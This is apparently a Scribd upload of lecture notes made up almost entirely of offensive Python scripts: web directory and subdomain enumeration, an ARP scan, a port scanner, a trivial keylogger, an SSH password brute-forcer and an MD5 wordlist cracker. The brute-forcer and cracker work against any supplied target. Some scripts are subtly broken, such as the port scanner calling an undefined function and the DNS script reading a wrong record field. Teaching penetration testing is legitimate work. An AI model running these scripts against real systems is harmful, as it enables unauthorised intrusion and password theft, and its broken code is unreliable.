Scribd
Upload
41 views

Lecture 9 Python Script

The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

Uploaded by

Max Riddle
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
41 views

Lecture 9 Python Script

The first script enumerates directories on a web server by checking HTTP response codes for specific URLs. The second uses a port scanner to probe a target IP for open ports within a specified range. The third uses Paramiko to perform SSH brute force attack by attempting to connect with username and passwords

Uploaded by

Max Riddle
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 5

Python script that performs directory enumeration on a

web server using a wordlist


import requests
import sys
sub_list = open("wordlist.txt").read()
directories = sub_list.splitlines()
for dir in directories:
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
r = requests.get(dir_enum)
if r.status_code==404:
pass
else:
print("Valid directory:" ,dir_enum)

script attempts to enumerate subdomains by resolving


DNS records and then checks if these subdomains are
accessible over HTTP.
import dns.resolver
import sys
def enumerate_subdomains(base_domain):
subdomains = []
try:
answers = dns.resolver.resolve(base_domain, 'A')
for rdata in answers:
subdomains.append(rdata.target)
except dns.resolver.NXDOMAIN:
print(f"No DNS record found for {base_domain}")
return subdomains

if len(sys.argv) != 2:
print("Usage: python script.py <base_domain>")
sys.exit(1)

base_domain = sys.argv[1]
subdomains = enumerate_subdomains(base_domain)

for sub in subdomains:


sub_domain = f"http://{sub}"
try:
response = requests.get(sub_domain)
if response.status_code == 200:
print("Valid domain:", sub_domain)
except requests.ConnectionError:
pass

script appears to enumerate directories by checking if


specific URLs are valid based on the HTTP response code
import requests
import sys

def enumerate_directories(base_url, directory_list):


valid_directories = []

for directory in directory_list:


dir_url = f"{base_url}/{directory}.html"
response = requests.get(dir_url)

if response.status_code != 404:
valid_directories.append(dir_url)

return valid_directories

if len(sys.argv) != 2:
print("Usage: python script.py <base_url>")
sys.exit(1)

base_url = sys.argv[1]

directory_list = open("wordlist.txt").read().splitlines()
valid_directories = enumerate_directories(base_url, directory_list)

for valid_dir in valid_directories:


print("Valid directory:", valid_dir)

Scapy to perform an ARP scan within a specified IP range


from scapy.all import *

interface = "eth0"
ip_range = "10.10.X.X/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"

packet = Ether(dst=broadcastMac)/ARP(pdst = ip_range)

ans, unans = srp(packet, timeout =2, iface=interface, inter=0.1)

for send,receive in ans:


print (receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

Port Scanner
import sys
import socket
def probeport(ip, port, result = 1):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
r = sock.connect_ex((ip, port))
if r == 0:
result = r
sock.close()
except Exception as e:
pass
return result

for port in ports:


sys.stdout.flush()
response = probe_port(ip, port)
if response == 0:
open_ports.append(port)

if open_ports:
print ("Open Ports are: ")
print (sorted(open_ports))
else:
print ("Looks like no ports are open :(")
ip = '192.168.1.6'
open_ports =[]

ports = range(1, 65535)

ports = { 137, 139, 23, 53, 80, 135, 443, 445}

Key Logger
import keyboard
keys = keyboard.record(until ='ENTER')
keyboard.play(keys)

bruteforce an SSH server using the Paramiko library in Python


import paramiko

target = str(input('Please enter target IP address: '))


username = str(input('Please enter username to bruteforce: '))
password_file = str(input('Please enter location of the password file: '))

def ssh_connect(password):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

try:
ssh.connect(target, port=22, username=username, password=password)
print('Password found: ' + password)
return True
except paramiko.AuthenticationException:
print('Incorrect password: ' + password)
return False
except Exception as e:
print(e)
finally:
ssh.close()

with open(password_file, 'r') as file:


for line in file.readlines():
password = line.strip()
if ssh_connect(password):
exit(0)

print('Password not found in the provided wordlist.')

script to crack an MD5 hash using a wordlist


import hashlib

wordlist_location = str(input('Enter wordlist file location: '))


hash_input = str(input('Enter hash to be cracked: '))

with open(wordlist_location, 'r') as file:


for line in file.readlines():
hash_ob = hashlib.md5(line.strip().encode())
hashed_pass = hash_ob.hexdigest()
if hashed_pass == hash_input:
print('Found cleartext password! ' + line.strip())
exit(0)

You might also like